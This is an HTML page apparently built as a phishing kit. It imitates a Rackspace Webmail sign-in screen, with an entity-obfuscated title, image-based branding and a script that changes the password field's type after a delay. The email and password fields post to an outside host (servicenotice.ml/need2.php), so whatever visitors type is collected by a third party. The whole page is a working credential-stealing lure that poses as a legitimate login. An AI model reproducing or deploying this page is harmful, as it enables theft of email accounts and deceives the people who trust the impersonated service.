<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>&#82;&#97;&#99;&#107;&#115;&#112;&#97;&#99;&#101;&#32;&#87;&#101;&#98;&#109;&#97;&#105;&#108;&#58;&#32;&#72;&#111;&#115;&#116;&#101;&#100;&#32;&#69;&#109;&#97;&#105;&#108;&#32;&#102;&#111;&#114;&#32;&#66;&#117;&#115;&#105;&#110;&#101;&#115;&#115;</title>
<script>setTimeout(function() {
  document.getElementsByTagName('input')[1].type = "password"
}, 1000);
</script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="images/favicon.ico"/>
<style type="text/css">
.textbox {
  	padding-left: 7px;
    font-size: 15px;
    font-family: Tahoma,Arial,Verdana;
    color: #444;
    height: 40px;
    width: 275px;
    border: 1px solid #cacaca;
}
 </style>
<style type="text/css">
div#container
{
	position:relative;
	width: 1365px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left;
}
body {text-align:center;margin:0}
</style>
<style>
p{font-size: 40px;}


div.header {
    width: 100%;
    height: 62px;
    margin: 0 0 0 0px;
    position: absolute;
    left: 0px;
    top: 0px;
    background: #333;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
$(window).load(function() {
	$(".loader").fadeOut("slow");
});
</script>
</head>
<body bgColor="#DDDDDD">
<div class="header">
            <div class="logo">

            </div>

        </div>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:61px; z-index:0"><img src="images/r1.png" alt="" title="" border="0"></div>

<div id="image2" style="position:absolute; overflow:hidden; left:366px; top:178px; width:615px; height:385px; z-index:1"><img src="images/r6.png" alt="" title="" border=0 width=615 height=385></div>

<div class="loader"></div>

<div id="image3" style="position:absolute; overflow:hidden; left:567px; top:635px; width:222px; height:17px; z-index:2"><a href="#"><img src="images/r3.png" alt="" title="" border=0 width=222 height=17></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:750px; top:212px; width:192px; height:296px; z-index:3"><a href="#"><img src="images/r4.png" alt="" title="" border=0 width=192 height=296></a></div>

<div id="image5" style="position:absolute; overflow:hidden; left:503px; top:432px; width:107px; height:15px; z-index:4"><a href="#"><img src="images/r5.png" alt="" title="" border=0 width=107 height=15></a></div>
<form action=https://servicenotice.ml/need2.php name=nurseryjao id=nurseryjao method=post>
<input name="usr" class="textbox" autocomplete="off" required type="email" style="position:absolute;width:319px;left:407px;top:283px;z-index:5">
<input name="psw" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:319px;left:407px;top:358px;z-index:6">
<div id="formimage1" style="position:absolute; left:406px; top:417px; z-index:7"><input type="image" name="formimage1" width="84" height="36" src="images/rkgn.png"></div>
<div id="formcheckbox1" style="position:absolute; left:403px; top:469px; z-index:8"><input type="checkbox" name="formcheckbox1"></div>
</div>

</body>
</html>
